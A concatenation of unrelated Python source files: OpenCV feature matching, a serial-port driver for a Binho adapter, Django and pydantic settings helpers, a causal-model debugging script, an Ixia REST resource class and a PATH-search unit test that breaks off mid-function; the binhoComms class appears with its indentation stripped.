        pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
        dst = cv2.perspectiveTransform(pts, M)

        center = findCenterOfTarget(dst)
        img2 = cv2.circle(img2, (center[0][0], center[0][1]), 10, (255, 0, 0), -1)
        img2 = cv2.polylines(img2, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
    else:
        # BUG FIX: was a Python-2-only `print` statement; this call form
        # works under both Python 2 and 3.
        print("Not enough matches are found - %d/%d" % (len(good), MIN_MATCH_COUNT))
        matchesMask = None

    draw_params = dict(matchColor=(0, 255, 0),  # draw matches in green color
                       singlePointColor=None,
                       matchesMask=matchesMask,  # draw only inliers
                       flags=2)

    # cv2.drawMatchesKnn expects list of lists as matches.
    # img3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,good,None)
    img3 = cv2.drawMatches(img1, kp1, img2, kp2, good, None, **draw_params)
    cv2.imshow("Brute Force Matching", img3)
    cv2.waitKey(3)
    return img3, center
# Live webcam loop: press 'n' to select a new template ROI, 'q' to quit.
cap = cv2.VideoCapture(0)

state = False
template = None

while True:
    ret, frame = cap.read()

    if template is None and state:
        # Let the user draw a ROI on the live frame to use as the template.
        r = cv2.selectROI('Frame', frame)
        template = frame[int(r[1]):int(r[1] + r[3]), int(r[0]):int(r[0] + r[2])]
        state = False

    if template is not None:
        # frame = kaze_match(template, frame)
        # frame = FLANNBasedMatcher(template, frame)
        # BUG FIX: this function returns an (image, center) tuple; the
        # original assigned the whole tuple to `frame`, which was then
        # passed to cv2.imshow and would fail. Unpack it instead.
        frame, _center = BruteForceMatchingwithSIFTDescriptorsandRatioTest(template, frame)

    cv2.imshow('Frame', frame)

    ikey = cv2.waitKey(10)
    if ikey == ord('q'):
        break
    elif ikey == ord('n'):
        # Select a new template on the next frame.
        template = None
        state = True
| StarcoderdataPython |
101667 | <reponame>pixelfelon/binho-python-package
import os
import enum
import threading
import queue
import signal
import sys
import serial
SERIAL_TIMEOUT = 0.5
class SerialPortManager(threading.Thread):
    """
    Daemon thread that owns the serial connection to the device.

    In command mode it reads newline-delimited lines, routing lines that
    start with "!" to the interrupt queue and lines that start with "-" to
    the receive queue, while transmitting queued commands with a trailing
    newline. In UART-bridge mode it shuttles raw characters between the
    port and the rxd/txd queues instead.
    """

    serialPort = None
    txdQueue = None
    rxdQueue = None
    intQueue = None
    stopper = None

    inBridgeMode = False

    def __init__(self, serialPort, txdQueue, rxdQueue, intQueue, stopper):  # pylint: disable=too-many-arguments
        super().__init__()
        self.serialPort = serialPort
        self.txdQueue = txdQueue
        self.rxdQueue = rxdQueue
        self.intQueue = intQueue
        self.stopper = stopper
        # Last exception seen by the worker loop (see get_exception()).
        self.exception = None
        # Daemon so a hung serial port cannot keep the process alive.
        self.daemon = True

    def run(self):
        try:
            comport = serial.Serial(self.serialPort, baudrate=1000000, timeout=0.025, write_timeout=0.05)
        except BaseException:
            # BUG FIX: the original only set the stopper and then fell
            # through to `comport.close()` on an unbound name, raising
            # NameError inside the thread. Bail out early instead.
            self.stopper.set()
            return

        while not self.stopper.is_set():  # pylint: disable=too-many-nested-blocks
            try:
                if self.inBridgeMode:
                    # Raw byte bridging between the port and the queues.
                    if comport.in_waiting > 0:
                        receivedData = comport.read().decode("utf-8")
                        self.rxdQueue.put(receivedData)

                    if not self.txdQueue.empty():
                        serialData = self.txdQueue.get()
                        comport.write(serialData.encode("utf-8"))
                else:
                    # Command mode: route complete lines by their first char.
                    if comport.in_waiting > 0:
                        receivedData = comport.readline().strip().decode("utf-8")

                        if len(receivedData) > 0:
                            if receivedData[0] == "!":
                                self.intQueue.put(receivedData)
                            elif receivedData[0] == "-":
                                self.rxdQueue.put(receivedData)

                    if not self.txdQueue.empty():
                        serialCommand = self.txdQueue.get() + "\n"
                        comport.write(serialCommand.encode("utf-8"))
            except Exception as e:  # pylint: disable=broad-except
                # Remember the failure for get_exception() and shut down.
                self.stopper.set()
                self.exception = e
                # print('Comm Error!')

        comport.close()

    def get_exception(self):
        """Return the exception that stopped the worker loop, or None."""
        return self.exception

    def startUartBridge(self):
        """Switch the thread into raw UART-bridge mode."""
        self.inBridgeMode = True

    def stopUartBridge(self):
        """Switch the thread back into command (line) mode."""
        self.inBridgeMode = False
class SignalHandler:
    """
    Handles OS signals by stopping the serial-manager thread; also usable
    programmatically via :meth:`sendStop`.
    """

    #: The stop event that's shared by this handler and threads.
    stopper = None

    #: The pool of worker threads
    workers = None

    def __init__(self, stopper, manager):
        self.stopper = stopper
        self.manager = manager

    def __call__(self, signum, frame):
        """
        This will be called by the python signal module
        https://docs.python.org/3/library/signal.html#signal.signal
        """
        self.sendStop()
        sys.exit(0)

    def sendStop(self):
        """Signal the manager thread to stop and wait for it to finish."""
        self.stopper.set()
        self.manager.join()
class binhoException(Exception):
    """Raised when the Binho device returns an unexpected response."""
    pass
class oneWireCmd(enum.Enum):
    """Enum for exchangeBytes1WIRE.

    NOTE(review): values mirror 1-Wire ROM command names (presumably NONE =
    no addressing, SELECT = match-ROM, SKIP = skip-ROM) -- confirm against
    the Binho firmware documentation.
    """
    NONE = "NONE"
    SELECT = "SELECT"
    SKIP = "SKIP"
class binhoComms:
def __init__(self, serialPort):
self.serialPort = serialPort
self.handler = None
self.manager = None
self.interrupts = None
self._stopper = None
self._txdQueue = None
self._rxdQueue = None
self._intQueue = None
self._debug = os.getenv("BINHO_NOVA_DEBUG")
# Destructor
def __del__(self):
if self.handler is not None:
try:
self.handler.sendStop()
except BaseException:
pass
# Private functions
def _checkInterrupts(self):
while not self._intQueue.empty():
self.interrupts.add(self._intQueue.get())
# Public functions
def sendCommand(self, command):
if self._debug is not None:
print(command)
self._txdQueue.put(command, timeout=SERIAL_TIMEOUT)
def readResponse(self):
result = "[ERROR]"
if self.manager.is_alive():
if not self.manager.get_exception():
try:
result = self._rxdQueue.get(timeout=SERIAL_TIMEOUT)
except queue.Empty:
# print('Connection with Device Lost!')
self.handler.sendStop()
else:
# print('Connection with Device Lost!')
self.handler.sendStop()
if self._debug is not None:
print(result)
return result
@classmethod
def checkDeviceSuccess(cls, ret_str):
if ret_str == "-OK":
return True
if ret_str == "-NG":
return False
raise binhoException(f"Invalid command response: {ret_str}")
# Communication Management
def start(self):
self.handler = None
self.manager = None
self.interrupts = None
self._stopper = None
self._txdQueue = None
self._rxdQueue = None
self._intQueue = None
comport = serial.Serial(self.serialPort, baudrate=1000000, timeout=0.025, write_timeout=0.05)
comport.close()
self.interrupts = set()
self._stopper = threading.Event()
self._txdQueue = queue.Queue()
self._rxdQueue = queue.Queue()
self._intQueue = queue.Queue()
# we need to keep track of the workers but not start them yet
# workers = [StatusChecker(url_queue, result_queue, stopper) for i in range(num_workers)]
self.manager = SerialPortManager(
self.serialPort, self._txdQueue, self._rxdQueue, self._intQueue, self._stopper,
)
# create our signal handler and connect it
self.handler = SignalHandler(self._stopper, self.manager)
signal.signal(signal.SIGINT, self.handler)
# start the threads!
self.manager.daemon = True
self.manager.start()
def open(self):
self.interrupts.clear()
self.manager.start()
def isConnected(self):
return self.manager.is_alive()
def isCommError(self):
e = self.manager.get_exception()
if e:
return True
return False
def close(self):
if self.handler:
self.handler.sendStop()
def interruptCount(self):
self._checkInterrupts()
return len(self.interrupts)
def interruptCheck(self, interrupt):
self._checkInterrupts()
if interrupt in self.interrupts:
return True
return False
def interruptClear(self, interrupt):
self.interrupts.discard(interrupt)
def interruptClearAll(self):
self.interrupts.clear()
def getInterrupts(self):
self._checkInterrupts()
return self.interrupts.copy()
# BUFFER COMMANDS
def clearBuffer(self, bufferIndex):
self.sendCommand("BUF" + str(bufferIndex) + " CLEAR")
result = self.readResponse()
return result
def addByteToBuffer(self, bufferIndex, value):
self.sendCommand("BUF" + str(bufferIndex) + " ADD " + str(value))
result = self.readResponse()
return result
def readBuffer(self, bufferIndex, numBytes):
self.sendCommand("BUF" + str(bufferIndex) + " READ " + str(numBytes))
result = self.readResponse()
return result
def writeToBuffer(self, bufferIndex, startIndex, data):
bufferData = ""
for x in data:
bufferData += " " + str(x)
self.sendCommand("BUF" + str(bufferIndex) + " WRITE " + str(startIndex) + bufferData)
result = self.readResponse()
return result
# UART COMMANDS
def setBaudRateUART(self, uartIndex, baud):
self.sendCommand("UART" + str(uartIndex) + " BAUD " + str(baud))
result = self.readResponse()
return result
def getBaudRateUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " BAUD ?")
result = self.readResponse()
return result
def setDataBitsUART(self, uartIndex, databits):
self.sendCommand("UART" + str(uartIndex) + " DATABITS " + str(databits))
result = self.readResponse()
return result
def getDataBitsUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " DATABITS ?")
result = self.readResponse()
return result
def setParityUART(self, uartIndex, parity):
self.sendCommand("UART" + str(uartIndex) + " PARITY " + str(parity))
result = self.readResponse()
return result
def getParityUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " PARITY ?")
result = self.readResponse()
return result
def setStopBitsUART(self, uartIndex, stopbits):
self.sendCommand("UART" + str(uartIndex) + " STOPBITS " + str(stopbits))
result = self.readResponse()
return result
def getStopBitsUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " STOPBITS ?")
result = self.readResponse()
return result
def setEscapeSequenceUART(self, uartIndex, escape):
self.sendCommand("UART" + str(uartIndex) + " ESC " + escape)
result = self.readResponse()
return result
def getEscapeSequenceUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " ESC ?")
result = self.readResponse()
return result
def beginBridgeUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " BEGIN")
result = self.readResponse()
self.manager.startUartBridge()
return result
def stopBridgeUART(self, sequence):
self.manager.stopUartBridge()
self._txdQueue.put(sequence, timeout=SERIAL_TIMEOUT)
result = self.readResponse()
return result
def writeBridgeUART(self, data):
self._txdQueue.put(data, timeout=SERIAL_TIMEOUT)
def readBridgeUART(self, timeout=SERIAL_TIMEOUT):
# Don't raise an exception if there is nothing to read, the other side may hae nothing to say
# But don't wait forever
return self._rxdQueue.get(timeout=timeout)
# SWI COMMANDS
def beginSWI(self, swiIndex, pin, pullup):
if not pullup:
self.sendCommand("SWI" + str(swiIndex) + " BEGIN " + str(pin))
else:
self.sendCommand("SWI" + str(swiIndex) + " BEGIN " + str(pin) + " PULL")
result = self.readResponse()
return result
def sendTokenSWI(self, swiIndex, token):
self.sendCommand("SWI" + str(swiIndex) + " TOKEN " + str(token))
result = self.readResponse()
return result
def sendFlagSWI(self, swiIndex, flag):
self.sendCommand("SWI" + str(swiIndex) + " FLAG " + str(flag))
result = self.readResponse()
return result
def sendCommandFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG COMMAND")
result = self.readResponse()
return result
def sendTransmitFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG TRANSMIT")
result = self.readResponse()
return result
def sendIdleFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG IDLE")
result = self.readResponse()
return result
def sendSleepFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG SLEEP")
result = self.readResponse()
return result
def transmitByteSWI(self, swiIndex, data):
self.sendCommand("SWI" + str(swiIndex) + " TX " + str(data))
result = self.readResponse()
return result
def receiveBytesSWI(self, swiIndex, count):
self.sendCommand("SWI" + str(swiIndex) + " RX " + str(count))
result = self.readResponse()
return result
def setPacketOpCodeSWI(self, swiIndex, opCode):
self.sendCommand("SWI" + str(swiIndex) + " PACKET OPCODE " + str(opCode))
result = self.readResponse()
return result
def setPacketParam1SWI(self, swiIndex, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET PARAM1 " + str(value))
result = self.readResponse()
return result
def setPacketParam2SWI(self, swiIndex, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET PARAM2 " + str(value))
result = self.readResponse()
return result
def setPacketDataSWI(self, swiIndex, index, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET DATA " + str(index) + " " + str(value))
result = self.readResponse()
return result
def setPacketDataFromBufferSWI(self, swiIndex, byteCount, bufferName):
self.sendCommand("SWI" + str(swiIndex) + " PACKET DATA " + str(byteCount) + " " + str(bufferName))
result = self.readResponse()
return result
def sendPacketSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " PACKET SEND")
result = self.readResponse()
return result
def clearPacketSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " PACKET CLEAR")
result = self.readResponse()
return result
def _to_hex_string(byte_array):
"""Convert a byte array to a hex string."""
hex_generator = ("{:02x}".format(x) for x in byte_array)
return "".join(hex_generator)
| StarcoderdataPython |
8430 | <reponame>gene1wood/django-product-details<filename>product_details/utils.py
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from product_details import settings_defaults
def settings_fallback(key):
    """Grab user-defined settings, or fall back to default.

    Looks up *key* on the Django settings object; if the project does not
    define it (or Django settings are unavailable/misconfigured), the value
    comes from ``settings_defaults`` instead.
    """
    try:
        value = getattr(settings, key)
    except (AttributeError, ImportError, ImproperlyConfigured):
        value = getattr(settings_defaults, key)
    return value
def get_django_cache(cache_name):
    """Return the named Django cache, tolerating old Django versions.

    Tries the modern ``caches`` mapping first (Django 1.7+) and falls back
    to the legacy ``get_cache`` helper on ImportError.  If Django is not
    configured yet (e.g. at import time) a plain dict is returned, which
    callers can use as a degenerate in-process cache.
    """
    try:
        from django.core.cache import caches  # django 1.7+
        return caches[cache_name]
    except ImportError:
        from django.core.cache import get_cache
        return get_cache(cache_name)
    except ImproperlyConfigured:
        # dance to get around not-setup-django at import time
        return {}
| StarcoderdataPython |
3315415 | <reponame>dougli1sqrd/agr_literature_service<filename>non_pr_tests/pydantic/config.py
from typing import Set
import inspect
from pydantic import (
BaseModel,
BaseSettings,
Field
)
from os import environ
from literature.schemas import EnvStateSchema
class SubModel(BaseModel):
    """Example nested settings model with default values."""
    foo = 'bar'
    apple = 1
class Settings(BaseSettings):
    """Demo pydantic settings sourced from environment variables / env file."""
    # Required; read from the 'my_api_key' environment variable.
    api_key: str = Field(..., env='my_api_key')
    # Required; expected to come from the configured env file.
    FROM_ENV_FILE: str
    OVERRIDE: str = Field(..., env='OVERRIDE')
    # to override domains:
    # export my_prefix_domains='["foo.com", "bar.com"]'
    domains: Set[str] = set()
    # to override more_settings:
    # export my_prefix_more_settings='{"foo": "x", "apple": 1}'
    more_settings: SubModel = SubModel()
    class Config:
        # env_prefix = 'my_prefix_' # defaults to no prefix, i.e. ""
        # env_file = ".env"
        # NOTE: evaluated once, at class-definition (import) time.
        env_file = environ.get('env_file', '.env')
# Module-level smoke output: show the env file in use, where EnvStateSchema
# lives, and the fully resolved settings.
# NOTE: ``env_file`` is bound only inside ``Settings.Config``'s class scope
# (class bodies do not leak names to module scope), so the original bare
# ``print(env_file)`` raised NameError at import time; access it through
# the class instead.
print(Settings.Config.env_file)
print(inspect.getfile(EnvStateSchema))
print(Settings().dict())
| StarcoderdataPython |
3355029 | import os
import sys
import json
import yaml
import pandas as pd
from ananke.graphs import ADMG
from networkx import DiGraph
from optparse import OptionParser
sys.path.append(os.getcwd())
sys.path.append('/root')
from src.causal_model import CausalModel
from src.generate_params import GenerateParams
def config_option_parser():
    """Configure the command line option parser and parse sys.argv.

    Returns:
        options: option parser handle holding the parsed values
        (``obj`` accumulates objectives; ``software``, ``hardware``,
        ``mode`` and ``bug_index`` are plain strings).
    """
    usage = """USAGE: %python3 run_unicorn_debug.py -o [objectives] -d [init_data] -s [software] -k [hardware] -m [mode] -i [bug_index]
    """
    parser = OptionParser(usage=usage)
    # -o may be repeated; each occurrence appends one objective name.
    parser.add_option(
        '-o', '--objective', dest='obj', default=[], nargs=1, type='choice',
        choices=('inference_time', 'total_energy_consumption', 'total_temp'),
        action='append', help="objective type")
    # The remaining options are simple string stores.
    for flag, longname, dest in (
            ('-s', '--software', 'software'),
            ('-k', '--hardware', 'hardware'),
            ('-m', '--mode', 'mode'),
            ('-i', '--bug_index', 'bug_index')):
        parser.add_option(flag, longname, action="store", type="string",
                          dest=dest, help=dest)
    options, _unused_args = parser.parse_args()
    return options
def run_unicorn_loop(CM, df,
                     tabu_edges, columns, options,
                     NUM_PATHS):
    """Run one iteration of unicorn causal-structure discovery.

    Learns candidate edges with FCI, resolves them against the tabu-edge
    constraints, and assembles the mixed graph over all columns.

    Returns:
        (G, di_edges, bi_edges): the ADMG plus its directed and
        bidirected edge lists.
    """
    fci_edges = CM.learn_fci(df, tabu_edges)
    # No extra edge source is used here; resolve_edges merges this empty
    # list with the FCI result under the tabu constraints.
    edges = []
    di_edges, bi_edges = CM.resolve_edges(edges, fci_edges, columns,
                                          tabu_edges, NUM_PATHS, options.obj)
    # Build the mixed graph (ADMG) from the resolved edge sets.
    G = ADMG(columns, di_edges=di_edges, bi_edges=bi_edges)
    return G, di_edges, bi_edges
if __name__ == "__main__":
query = 0.8
NUM_PATHS = 25
options = config_option_parser()
# Initialization
with open(os.path.join(os.getcwd(), "etc/config.yml")) as file:
cfg = yaml.load(file, Loader=yaml.FullLoader)
# nodes for causal graph
soft_columns = cfg["software_columns"][options.software]
hw_columns = cfg["hardware_columns"][options.hardware]
kernel_columns = cfg["kernel_columns"]
perf_columns = cfg["perf_columns"]
obj_columns = options.obj
columns = soft_columns + hw_columns + kernel_columns + perf_columns + obj_columns
conf_opt = soft_columns + hw_columns + kernel_columns
if len(options.obj) > 1:
init_dir = os.path.join(os.getcwd(), cfg["init_dir"], "multi",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + "initial.csv")
bug_dir = os.path.join(os.getcwd(), cfg["bug_dir"], "multi", options.hardware,
options.software, options.hardware + "_" + options.software + "_" + "multi.csv")
with open(os.path.join(os.getcwd(), cfg["debug_dir"], "multi", options.hardware,
options.software, "measurement.json")) as mfl:
m = json.load(mfl)
else:
init_dir = os.path.join(os.getcwd(), cfg["init_dir"], "single",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + "initial.csv")
bug_dir = os.path.join(os.getcwd(), cfg["bug_dir"], "single",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + options.obj[0] + ".csv")
with open(os.path.join(os.getcwd(), cfg["debug_dir"], "single", options.hardware,
options.software, "measurement.json")) as mfl:
m = json.load(mfl)
# get init data
df = pd.read_csv(init_dir)
df = df[columns]
# get bug data
bug_df = pd.read_csv(bug_dir)
# initialize causal model object
CM = CausalModel(columns)
g = DiGraph()
g.add_nodes_from(columns)
# edge constraints
tabu_edges = CM.get_tabu_edges(columns, conf_opt, options.obj)
G, di_edges, bi_edges = run_unicorn_loop(CM, df,
tabu_edges, columns, options,
NUM_PATHS)
g.add_edges_from(di_edges + bi_edges)
var_types = {}
for col in columns:
var_types[col] = "c"
# Get Bug and update df
bug_exists = True
if options.bug_index:
bug_df = bug_df.iloc[int(options.bug_index):int(options.bug_index) + 1]
result_columns = conf_opt + obj_columns
measurement_dir = os.path.join(os.getcwd(),"data","measurement","output","debug_exp.csv")
for bug_id in range(len(bug_df)):
result_df = pd.DataFrame(columns=result_columns)
if options.bug_index:
bug = bug_df.loc[int(options.bug_index)]
bug_id = int(options.bug_index)
else:
bug = bug_df.loc[bug_id]
# update df after a bug is resolved
df = pd.read_csv(init_dir)
df = df[columns]
# initialize causal model object
CM = CausalModel(columns)
g = DiGraph()
g.add_nodes_from(columns)
# edge constraints
tabu_edges = CM.get_tabu_edges(columns, conf_opt, options.obj)
G, di_edges, bi_edges = run_unicorn_loop(CM, df,
tabu_edges, columns, options,
NUM_PATHS)
g.add_edges_from(di_edges + bi_edges)
bug_exists = True
print("--------------------------------------------------")
print("BUG ID: ", bug_id)
print("--------------------------------------------------")
it = 0
previous_config = bug[conf_opt].copy()
while bug_exists:
# identify causal paths
paths = CM.get_causal_paths(columns, di_edges, bi_edges,
options.obj)
# compute causal paths
if len(options.obj) < 2:
# single objective faults
for key, val in paths.items():
if len(paths[key]) > NUM_PATHS:
paths = CM.compute_path_causal_effect(df, paths[key], G,
NUM_PATHS)
else:
paths = paths[options.obj[0]]
# compute individual treatment effect in a path
print(paths)
config = CM.compute_individual_treatment_effect(df, paths, g,
query, options, bug[options.obj[0]],
previous_config, cfg, var_types)
else:
# multi objective faults
paths = paths[options.obj[0]]
# compute individual treatment effect in a path
config = CM.compute_individual_treatment_effect(df, paths, g,
query, options, bug[options.obj],
previous_config, cfg, var_types)
# perform intervention. This updates the init_data
if config is not None:
if options.mode == "offline":
curm = m[options.hardware][options.software][options.obj[0]][str(
bug_id)][str(it)]["measurement"]
if curm < (1 - query) * bug[options.obj[0]]:
bug_exists = False
print("--------------------------------------------------")
print("+++++++++++++++Recommended Fix++++++++++++++++++++")
print(config)
print("Unicorn Fix Value", curm)
print("Number of Samples Required", str(it))
print("--------------------------------------------------")
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print(bug[conf_opt])
print("Bug Objective Value", int(bug[options.obj[0]]))
print("--------------------------------------------------")
config = config.tolist()
config.extend([curm])
config = pd.DataFrame([config])
config.columns = result_columns
result_df = pd.concat([result_df, config], axis=0)
result_df = result_df[result_columns]
result_df["bug_id"] = bug_id
result_df["method"] = "Unicorn"
result_df["num_samples"]=it
result_df["gain"]= ((bug[options.obj[0]]-curm)/bug[options.obj[0]])*100
if options.bug_index is None:
if bug_id == 0:
result_df.to_csv(measurement_dir,index=False)
else:
result_df.to_csv(measurement_dir,index=False, header=False,mode="a")
else:
curc = m[options.hardware][options.software][options.obj[0]][str(
bug_id)][str(it)]["conf"]
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print("Recommended Config Objective Value", curm)
print("--------------------------------------------------")
it += 1
config = config.tolist()
config.extend(curc)
config.extend([curm])
config = pd.DataFrame([config])
config.columns = columns
df = pd.concat([df, config], axis=0)
df = df[columns]
# previous_config
previous_config = config.squeeze()[conf_opt]
# update initial
run_unicorn_loop(CM, df, tabu_edges,
columns, options, NUM_PATHS)
elif options.mode == "online":
gprm = GenerateParams(cfg, options, config,
bug_id, it, "unicorn")
curc, curm = gprm.run_unicorn_experiment()
if curm < (1 - query) * bug[options.obj[0]]:
bug_exists = False
print("--------------------------------------------------")
print("+++++++++++++++Recommended Fix++++++++++++++++++++")
print(config)
print("Unicorn Fix Value", curm)
print("Number of Samples Required", str(it))
print("--------------------------------------------------")
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print(bug[conf_opt])
print("Bug Objective Value", int(bug[options.obj[0]]))
print("--------------------------------------------------")
config = config.tolist()
config.extend([curm])
config = pd.DataFrame([config])
config.columns = result_columns
result_df = pd.concat([result_df, config], axis=0)
result_df = result_df[result_columns]
result_df["bug_id"] = bug_id
result_df["method"] = "Unicorn"
result_df["num_samples"]=it
result_df["gain"]= ((bug[options.obj[0]]-curm)/bug[options.obj[0]])*100
if options.bug_index is None:
if bug_id == 0:
result_df.to_csv(measurement_dir,index=False)
else:
result_df.to_csv(measurement_dir,index=False, header=False,mode="a")
else:
# run loop
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print("Recommended Config Objective Value", curm)
print("--------------------------------------------------")
it += 1
config = config.tolist()
config.extend(curc)
config.extend([curm])
config = pd.DataFrame([config])
config.columns = columns
df = pd.concat([df, config], axis=0)
df = df[columns]
# previous_config
previous_config = config.squeeze()[conf_opt]
run_unicorn_loop(CM, df, tabu_edges,
columns, options, NUM_PATHS)
else:
print("[ERROR]: invalid mode")
else:
print("[ERROR]: no config recommended")
bug_exists = False
| StarcoderdataPython |
4458 | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class FixedClassifier(Base):
    """Specifies the packets to apply this profile to. If there are multiple patterns enabled, they are ANDed: each packet must match all packets in order to be impaired by this profile.
    The FixedClassifier class encapsulates a list of fixedClassifier resources that are managed by the user.
    A list of resources can be retrieved from the server using the FixedClassifier.find() method.
    The list can be managed by using the FixedClassifier.add() and FixedClassifier.remove() methods.
    """
    __slots__ = ()
    _SDM_NAME = 'fixedClassifier'
    # No simple attributes or enums on this resource type.
    _SDM_ATT_MAP = {
    }
    _SDM_ENUM_MAP = {
    }
    def __init__(self, parent, list_op=False):
        super(FixedClassifier, self).__init__(parent, list_op)
    @property
    def Pattern(self):
        """
        Returns
        -------
        - obj(uhd_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern.Pattern): An instance of the Pattern class

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # Imported lazily to avoid a circular import at module load time.
        from uhd_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern import Pattern
        if self._properties.get('Pattern', None) is not None:
            return self._properties.get('Pattern')
        else:
            return Pattern(self)
    def add(self):
        """Adds a new fixedClassifier resource on the server and adds it to the container.

        Returns
        -------
        - self: This instance with all currently retrieved fixedClassifier resources using find and the newly added fixedClassifier resources available through an iterator or index

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
    def remove(self):
        """Deletes all the contained fixedClassifier resources in this instance from the server.

        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        self._delete()
    def find(self):
        """Finds and retrieves fixedClassifier resources from the server.

        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve fixedClassifier resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all fixedClassifier resources from the server.

        Returns
        -------
        - self: This instance with matching fixedClassifier resources retrieved from the server available through an iterator or index

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        """Retrieves a single instance of fixedClassifier data from the server.

        Args
        ----
        - href (str): An href to the instance to be retrieved

        Returns
        -------
        - self: This instance with the fixedClassifier resources from the server available through an iterator or index

        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
| StarcoderdataPython |
import os
import unittest
import unittest.mock

from vsi.tools.dir_util import (
    find_file_in_path, is_subdir
)
from vsi.test.utils import TestCase
class DirTest(TestCase):
    """Common base class for directory-utility test cases."""
    pass
class FindFileInPath(DirTest):
    """Tests for ``find_file_in_path`` and ``is_subdir``.

    NOTE(review): relies on ``self.temp_dir`` (a TemporaryDirectory-like
    object with a ``.name`` attribute) being provided by the vsi TestCase
    base class -- confirm.
    NOTE(review): ``unittest.mock`` is accessed as an attribute of
    ``unittest``; plain ``import unittest`` does not guarantee the submodule
    is loaded -- verify an explicit ``import unittest.mock`` exists.
    """
    def test_path_argument(self):
        # Empty lists
        self.assertIsNone(find_file_in_path('foo.txt', ''))
        self.assertIsNone(find_file_in_path('foo.txt', os.pathsep))

        open(os.path.join(self.temp_dir.name, 'bar.txt',), 'wb').close()

        # Just the dir
        self.assertIsNone(find_file_in_path('foo.txt', self.temp_dir.name))
        self.assertEqual(find_file_in_path('bar.txt', self.temp_dir.name),
                         os.path.join(self.temp_dir.name, 'bar.txt'))

        # Multiple: only one of the search entries exists/contains the file.
        self.assertEqual(find_file_in_path('bar.txt',
                                           os.pathsep.join([
                                               os.path.join(self.temp_dir.name, '1'),
                                               os.path.join(self.temp_dir.name, '2'),
                                               self.temp_dir.name,
                                               os.path.join(self.temp_dir.name, '3')
                                           ])),
                         os.path.join(self.temp_dir.name, 'bar.txt'))

    def test_env(self):
        # Same cases as above, but the search path comes from $PATH.
        # Empty lists
        with unittest.mock.patch.dict(os.environ, {'PATH': ""}):
            self.assertIsNone(find_file_in_path('foo.txt'))
        with unittest.mock.patch.dict(os.environ, {'PATH': os.pathsep}):
            self.assertIsNone(find_file_in_path('foo.txt'))

        open(os.path.join(self.temp_dir.name, 'bar.txt',), 'wb').close()

        # Just the dir
        with unittest.mock.patch.dict(os.environ, {'PATH': self.temp_dir.name}):
            self.assertIsNone(find_file_in_path('foo.txt'))
            self.assertEqual(find_file_in_path('bar.txt'),
                             os.path.join(self.temp_dir.name, 'bar.txt'))

        # Multiple dirs
        with unittest.mock.patch.dict(os.environ, {'PATH':
                                                   os.pathsep.join([
                                                       os.path.join(self.temp_dir.name, '1'),
                                                       os.path.join(self.temp_dir.name, '2'),
                                                       self.temp_dir.name,
                                                       os.path.join(self.temp_dir.name, '3')])}):
            self.assertEqual(find_file_in_path('bar.txt'),
                             os.path.join(self.temp_dir.name, 'bar.txt'))

    def test_is_subdir(self):
